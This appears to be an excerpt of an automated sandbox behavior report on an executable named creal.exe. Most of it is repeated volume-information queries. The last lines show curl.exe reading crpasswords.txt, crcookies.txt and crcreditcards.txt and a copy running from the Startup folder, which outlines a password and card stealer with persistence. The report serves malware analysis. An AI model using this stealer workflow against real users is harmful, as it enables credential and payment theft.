            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\crpasswords.txt VolumeInformationJump to behavior
            Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\crcookies.txt VolumeInformationJump to behavior
            Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\crcreditcards.txt VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
